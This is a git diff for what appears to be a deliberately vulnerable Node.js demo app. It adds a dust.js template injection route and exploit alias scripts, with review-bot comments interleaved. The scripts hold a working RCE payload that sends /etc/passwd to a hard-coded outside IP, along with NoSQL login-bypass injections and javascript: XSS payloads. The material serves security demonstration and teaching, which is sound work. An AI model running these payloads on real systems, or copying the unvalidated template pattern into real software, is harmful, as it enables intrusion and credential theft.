diff --git a/app.js b/app.js
index 66983bec9c..92c4282cd9 100644
--- a/app.js
+++ b/app.js
@@ -10,7 +10,7 @@ var crypto = require('crypto');
 var express = require('express');
 var http = require('http');
 var path = require('path');
-var engine = require('ejs-locals');
+var ejsEngine = require('ejs-locals');
 var cookieParser = require('cookie-parser');
 var bodyParser = require('body-parser');
 var methodOverride = require('method-override');
@@ -19,13 +19,18 @@ var errorHandler = require('errorhandler');
 var optional = require('optional');
 var marked = require('marked');
 var fileUpload = require('express-fileupload');
+var dust = require('dustjs-linkedin');
+var dustHelpers = require('dustjs-helpers');
+var cons = require('consolidate');
 var app = express();
 var routes = require('./routes');
 // all environments
 app.set('port', process.env.PORT || 3001);
-app.engine('ejs', engine);
+app.engine('ejs', ejsEngine);
+app.engine('dust', cons.dust);
+cons.dust.helpers = dustHelpers;
 app.set('views', path.join(__dirname, 'views'));
 app.set('view engine', 'ejs');
 app.use(logger('dev'));
@@ -45,6 +50,7 @@ app.get('/destroy/:id', routes.destroy);
 app.get('/edit/:id', routes.edit);
 app.post('/update/:id', routes.update);
 app.post('/import', routes.import);
+app.get('/about_new', routes.about_new);
 // Static
 app.use(st({path: './public', url: '/public'}));
diff --git a/exploits/dustjs-exploits.sh b/exploits/dustjs-exploits.sh
new file mode 100644
index 0000000000..d3987e1653
--- /dev/null
+++ b/exploits/dustjs-exploits.sh
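Review bot: `cons.dust.helpers = dustHelpers;` in the second hunk does not look like a consolidate setting — consolidate's documented way to hand it an engine instance is `cons.requires.dust = …`, and the helper registration presumably already happens as a side effect of `require('dustjs-helpers')`, so the assignment is likely dead and only works because consolidate falls back to requiring `dustjs-helpers` itself. `var dust` is likewise not referenced anywhere in this hunk; if it is unused elsewhere in app.js it should go. If the intent is to make the wiring explicit, `cons.requires.dust = dustHelpers;` (the module returned by dustjs-helpers is the dust instance with helpers attached) is the line that consolidate will actually honour — worth confirming against the pinned consolidate 0.14.5 before relying on it.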
@@ -0,0 +1,17 @@
+if [ -z "$GOOF_HOST" ]; then
+ export GOOF_HOST=http://localhost:3001
+fi
+
+# Simple request
+alias dust1="curl $GOOF_HOST'/about_new?device=Desktop'"
+
+# Request with array
+alias dust2="curl $GOOF_HOST'/about_new?device\[\]=Desktop'"
+
+# Trigger error
+alias dust3="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27'"
+
+# Simple RCE, logs to console
+alias dust4="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-console.log(%27FrontendConf%20Was%20Here%27)-%27'"
+
+alias dust5="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-require(%27child_process%27).exec(%27curl%20-m%203%20-F%20%22x%3D%60cat%20%2Fetc%2Fpasswd%60%22%20http%3A%2F%2F34.205.135.170%2F%27)-%27'"
diff --git a/exploits/exploit-aliases.sh b/exploits/exploit-aliases.sh
index 50478c10b4..07d8444ac6 100755
--- a/exploits/exploit-aliases.sh
+++ b/exploits/exploit-aliases.sh
@@ -3,3 +3,5 @@ source mongoose-exploits.sh
 source st-exploits.sh
 source ms-exploits.sh
+source nosql-exploits.sh
+source dustjs-exploits.sh
diff --git a/exploits/marked-exploit.sh b/exploits/marked-exploit.sh
index f435e3ad08..d698420acf 100644
--- a/exploits/marked-exploit.sh
+++ b/exploits/marked-exploit.sh
@@ -10,10 +10,10 @@ This is **markdown**
 # Failed XSS
 [Gotcha](javascript:alert(1))
-# Successfull XSS using vuln
+# Failed XSS despite URL encoding
 [Gotcha](javascript:alert(1))
-# Successfull XSS using vuln
+# Successfull XSS using vuln and browser interpretation
 [Gotcha](javascript:this;alert(1))
 # Most boasty exploit
diff --git a/exploits/nosql-exploits.sh b/exploits/nosql-exploits.sh
new file mode 100644
index 0000000000..432abfc39c
--- /dev/null
+++ b/exploits/nosql-exploits.sh
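Review bot: The `dust5` alias ships a live exfiltration target: the payload reads `/etc/passwd` and POSTs it to the hard-coded address `34.205.135.170`, so anyone who runs this demo against a real host leaks that file to whoever controls that IP today, not to the person giving the demo. Take the collector from an environment variable with a local default instead, e.g. `: "${GOOF_EXFIL:=http://127.0.0.1:8000/}"` near the top and the percent-encoded value of `$GOOF_EXFIL` in place of the literal address, and give `dust5` the one-line comment its siblings have, e.g. `# RCE with out-of-band exfiltration of /etc/passwd (needs a listener at $GOOF_EXFIL)`. Note also that `$GOOF_HOST` is expanded when these aliases are defined, not when they are run, because the alias bodies are double-quoted — fine as long as the file is sourced after `GOOF_HOST` is set, but worth a comment since the `export` above suggests otherwise.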
@@ -0,0 +1,20 @@
+
+if [ -z "$GOOF_HOST" ]; then
+ export GOOF_HOST=http://localhost:3001
+fi
+
+# Default working case - form fill
+alias ns1="echo -n 'username=admin&password=SuperSecretPassword' | http --form $GOOF_HOST/admin -v"
+
+# JSON working login
+alias ns2='echo '"'"'{"username":"admin", "password":"SuperSecretPassword"}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# failed login
+alias ns3='echo '"'"'{"username":"admin", "password":"WrongPassword"}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# successful login, NOSQL Injection, knowing the username
+alias ns4='echo '"'"'{"username": "admin", "password": {"$gt": ""}}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# successful login, NOSQL Injection, without knowing the username
+alias ns5='echo '"'"'{"username": {"$gt": ""}, "password": {"$gt": ""}}'"'"' | http --json $GOOF_HOST/admin -v'
+
diff --git a/exploits/nosql-injection.sh b/exploits/nosql-injection.sh
deleted file mode 100644
index 74b77a6e2b..0000000000
--- a/exploits/nosql-injection.sh
+++ /dev/null
@@ -1,9 +0,0 @@
-
-echo -n 'username=admin&password=SuperSecretPassword' | http --form http://localhost:3001/admin -v
-
-echo '{"username":"admin", "password":"SuperSecretPassword"}' | http --json http://localhost:3001/admin -v
-
-echo '{"username": {"$gt": ""}, "password": {"$gt": ""}}' | http --json http://localhost:3001/admin -v
-
-echo '{"username": "admin", "password": {"$gt": ""}}' | http --json http://localhost:3001/admin -v
-
diff --git a/package.json b/package.json
index 087260e07a..f367c6babc 100644
--- a/package.json
+++ b/package.json
@@ -16,6 +16,9 @@
 "body-parser": "1.9.0",
 "cfenv": "^1.0.4",
 "cookie-parser": "1.3.3",
+ "consolidate": "0.14.5",
+ "dustjs-linkedin": "2.5.0",
+ "dustjs-helpers": "1.5.0",
 "ejs": "1.0.0",
 "ejs-locals": "1.0.2",
 "errorhandler": "1.2.0",
diff --git a/routes/index.js b/routes/index.js
index 49908bb42b..d0c3b0f41f 100644
--- a/routes/index.js
+++ b/routes/index.js
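Review bot: `ns1` is the only alias in this file whose body is double-quoted, so its `$GOOF_HOST` is expanded once when the file is sourced, whereas `ns2`–`ns5` keep `$GOOF_HOST` inside single quotes and re-expand it on every invocation; changing `GOOF_HOST` after sourcing therefore retargets four of the five aliases but not the first. Use the same quoting as its siblings: `alias ns1='echo -n '"'"'username=admin&password=SuperSecretPassword'"'"' | http --form $GOOF_HOST/admin -v'`. The comments on `ns4`/`ns5` describe the `{"$gt": ""}` operator injection well; a one-line note at the top saying that these rely on the body-parser JSON path handing objects through to the Mongo query unvalidated would tell a reader where the fix belongs.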
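Review bot: `dustjs-linkedin` is pinned to exactly `2.5.0` and `dustjs-helpers` to `1.5.0`, and the `dustjs-exploits.sh` aliases added in this same diff are written against that combination, so the pin is presumably what keeps the demo exploitable rather than an oversight. package.json cannot carry a comment, so that intent is invisible to anyone who later runs a dependency-update bot; record it where it will be seen — a `# pinned on purpose: the dust4/dust5 aliases depend on dustjs-linkedin 2.5.0 / dustjs-helpers 1.5.0` line at the top of `exploits/dustjs-exploits.sh`, or an entry in the README's vulnerability list — and confirm the pin is exempted from any automated bumping.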
@@ -194,3 +194,13 @@ exports.import = function (req, res, next) {
 res.redirect('/');
 };
+
+exports.about_new = function (req, res, next) {
+ console.log(JSON.stringify(req.query));
+ return res.render("about_new.dust",
+ {
+ title: 'Goof TODO',
+ subhead: 'Vulnerabilities at their best',
+ device: req.query.device
+ });
+};
diff --git a/views/about_new.dust b/views/about_new.dust
new file mode 100644
index 0000000000..b835046fb1
--- /dev/null
+++ b/views/about_new.dust
@@ -0,0 +1,18 @@ + + + +{@if cond="'{device}'=='Desktop'"} + +{:else} + +{/if} + 
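Review bot: `about_new` passes `req.query.device` to the template without checking its type, and with Express's default query parser `device[]=…` arrives as an array rather than a string; the `dust4` and `dust5` aliases added in this same diff use exactly that form to get `console.log` and `require('child_process')` executed through the template, so the value needs to be a string — ideally one of a known set — before it reaches `{device}`. If the route is meant to stay exploitable for the demo (the `subhead` text suggests so), say it in code with `// INTENTIONALLY VULNERABLE: device is rendered unvalidated into a dust @if condition (see exploits/dustjs-exploits.sh)`; otherwise coerce it with `device: typeof req.query.device === 'string' ? req.query.device : ''`. `console.log(JSON.stringify(req.query))` also writes raw request input to the server log; mark it as debug output or drop it before this leaves the demo. The `exports.import` handler closed by the hunk's context lines starts outside the hunk.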

{title}

+

{subhead}

+ +

The BESTest todo app evar

+ +
Device string (debug): {device}
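Review bot: `{@if cond="'{device}'=='Desktop'"}` builds the helper's condition by splicing the `device` value into a quoted expression string, which is why a value containing a single quote breaks out of it — the `dust3`–`dust5` aliases in this diff rely on exactly that. dustjs-helpers has comparison helpers that take the value as data rather than as expression text, so the branch can be written `{@eq key=device value="Desktop"}…{:else}…{/eq}` with no string to escape from; if the eval-style `@if` is being kept deliberately for the demo, a template comment `{! INTENTIONALLY VULNERABLE: @if cond is evaluated as JavaScript !}` above it would make that explicit. The `Device string (debug): {device}` line echoes the raw value back and should go once the route is settled. The HTML of this hunk is not preserved in this rendering, so I cannot see whether the other interpolations sit in attribute or text context.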
+ + +